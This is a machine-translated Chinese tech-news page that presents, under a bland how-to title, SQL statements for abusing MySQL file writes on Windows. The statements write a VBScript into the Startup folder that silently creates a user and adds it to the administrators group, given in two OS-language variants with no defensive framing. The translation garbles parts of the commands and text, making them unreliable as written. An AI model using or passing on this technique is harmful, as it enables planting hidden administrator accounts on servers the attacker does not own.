Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

How to add users to startup in MySQL in both Chinese and English

2025-04-05 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Database >

Share

Shulou(Shulou.com)05/31 Report--

This article mainly introduces how to add users to the startup of MySQL in both Chinese and English, which has a certain reference value, and interested friends can refer to it. I hope you will gain a lot after reading this article.

For adding complete user code in the Chinese version of the operating system:

Use test;create table a (cmd text); insert into a values ("set wshshell=createobject ("wscript.shell")"); insert into a values ("a=wshshell.run ("cmd.exe / c net user test 123 subscription subscription abcABC / add", 0) "); insert into a values (" b=wshshell.run ("" cmd.exe / c net localgroup administrators test / add "", 0) ") Select * from an into outfile "C:\ Documents and Settings\ All Users\" start menu\ Program\ start\ a.vbs "; drop table a

English version:

Use test;create table a (cmd text); insert into a values ("set wshshell=createobject ("wscript.shell")"); insert into a values ("a=wshshell.run ("cmd.exe / c net user test 123 examples including abcABC / add", 0) "); insert into a values (" b=wshshell.run ("" cmd.exe / c net localgroup administrators test / add ", 0)"); select * from an into outfile "C:\ Documents and Settings\ All Users\ Start Menu\ Programs\ Startup\ a.vbs" Drop table a; thank you for reading this article carefully. I hope the article "how to add users to MySQL in Chinese and English" shared by the editor will be helpful to you. At the same time, I also hope you will support us and pay attention to the industry information channel. More related knowledge is waiting for you to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report